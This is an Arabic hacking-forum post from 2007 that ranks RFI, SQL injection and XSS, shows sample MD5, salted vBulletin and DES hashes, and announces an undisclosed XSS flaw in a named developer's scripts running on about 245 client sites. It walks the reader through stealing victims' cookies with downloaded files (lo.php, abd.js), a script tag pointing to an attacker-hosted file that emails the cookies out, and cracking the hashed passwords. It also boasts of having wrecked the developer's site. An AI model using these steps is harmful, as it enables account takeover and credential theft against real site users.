اليوم سوف أعرض عليكم ثغره حصرية لم تكتشف بعد من قبل اي شخص
قبل لا أبدء بالتفاصيل بعطيكم موجز عن هذه أخطر ثلاث ثغرات ووأخطر ثلاث تشفيرات
نبداء بالثغرات من الأقوى إلى الأضعف
ثغرة Remote File Inclusion
وهي من أقوى الثغرات وأسرعها إختراقاً للموقع .. ممممم ... ليس الموقع فقط بل جميع مواقع يلي على السيرفر مممم بل السيرفر بالكامل أيضاً يخترق بواسطة هذه الثغره
ثغرة SQL Injection
يعد من أخطر الثغرات وحتى المواقع العالمية مصابه بها
وموقع yahoo يلي ترتيبه 1 عالمي مصاب بها
وظيفة الثغره إستعلام في قواعد البيانات.. مثال: هذا المنتدى
يمكنني أن ستعرض إسم المستخد + الباسورد + السالت + البريد للمدير أو العضو عن طريق هذه الثغره .. ويوجد أشياء أخرى يمكن أن تستغلها من الثغره كقرائه الملفات على الموقع وتعديل الملفات .. وكأنك على ثغره Remote File Inclusion ولكن ليست على كل الثغره تعمل على حسب الثغره
ثغره XSS
وهي ثغره مهمه جداً وخطيره بمعنى الكلمة
وهي تقوم بسرقة الكوكيز الخاص بالشخص المرسل له
والكوكيز تحتوي على الباسورد مشفر بتشفير MD5 سواء كان لمدير أو عضو على حسب نوع ثغره XSS
مثال على التشفير MD5
هذا إسمي قبلي التشفير
Mr.Dangers
بعد التشفير MD5
429079908d45038d242f59dddcd41845
لاحظ بأنه بعد التشفير صار عدد احروف والأرقام بالضبط 32 حرف ورقم
سوف تلاحظون في شرحي بأني سوف أخذ الكوكيز + أفك تشفير الباسورد
وهذه أخطر ثلاث تشفيرات
وسوف نشفر إسم
M.Dangers
MD5 تشفير مشهور جداً وسهل فكه
شكل التشفير 429079908d45038d242f59dddcd41845
MD5+SALT تستخدم في المنتديات vBulletin ... وللعلم هذا المنتدى هو vBulletin 3.6.7 PL1
شكل التشفير
MD5
5ed29c1cbe9fe89a790a7b6ffca3eee8
SALT
5-%
DES وهو تشفير الباسورد للوحة التحكم للموقع أي CPANEL وأيضاً سهل فك تشفيره
شكل التشفير
.-33UTqNQyfcM
ولو أقعد أتكلم عن التشفير لازم تجيبون قهوه وشاي<<<أقول طييييير .. خليك على الأندومي
واليوم سوف أبداء من أضعف ثغره
مكتشف الثغره Mr.Dangers
بريد العضو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تاريخ الإكتشاف
هجري 29-10-1428
ميلادي 10-11-2007
المبرمج للسكربت المصاب
اللوماني
موقع اللوماني
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وقد تم تدمير ملفات موقعه سابقاً
شاهدوا الصورة ^_^
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وظيفة الثغره
إختراق الأعضاء عن طريق ثغرة بالرسائل الخاصه
تعرفون مين هذا المبرمج
هذا يلي برمجة سكربتات الأغاني والأفلام والبلوتوث
تعروف موقع شبكة أوز للأغاني ترتيبه في أليكسا 500 يعني عالمي
عدد عملائه أكثر من 200 عميل .. وأتوقع إنه صار أكثر 300 ولكن شاهدوا معي
رابط لمشاهده العملاء ..
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
عدد المواقع : 245
ملاحظة:: لم يضع جميع العملاء
نبداء الشرح
أولا أدخل لأحد عملائه وليكن
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الأن سوف نسجل في الموقع
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وبعد التسجيل
تصلك راسله تفعيل الإشتراك الأن فعل إشتراكك من البريد
وبعدين أدخل هنا لملفك الشخص
وهذا رابطه
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
وبعدها تابع الشرح بالفيديو
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الأدوات المستخدمه لجلب الباسورد على الإيميل
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
والشكر موصول لمستر جوكر على توفيره للأدوات
ملاحظة الإستخدام
أفتح ملف lo.php بإستخدام برنامج المفكره
وراح تلقى المطلوب تغييره داخل الملف
غير البريد الموجود إلى بريدك
ثم أرفع الملف مع الملف الثاني abd.js إلى موقعك المجاني أو المدفوع
وأخيراً هذا الكود
****** src=http://XXXXXX/abd.js></******>
ضع مكان مسار abd.js الموجود في موقعك
وأرسل هذا الكود لأي ضحيه وبإذن الله تصلك رساله فوريه على البريد
برنامج فك التشفير المستخدم في الشرح
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
والقادم أقوى
والحقوق محفوظة لمنظمة المسلمين
وأي إستفسار ... جهازين للرد
أخوكم في الله
KING OF HACKER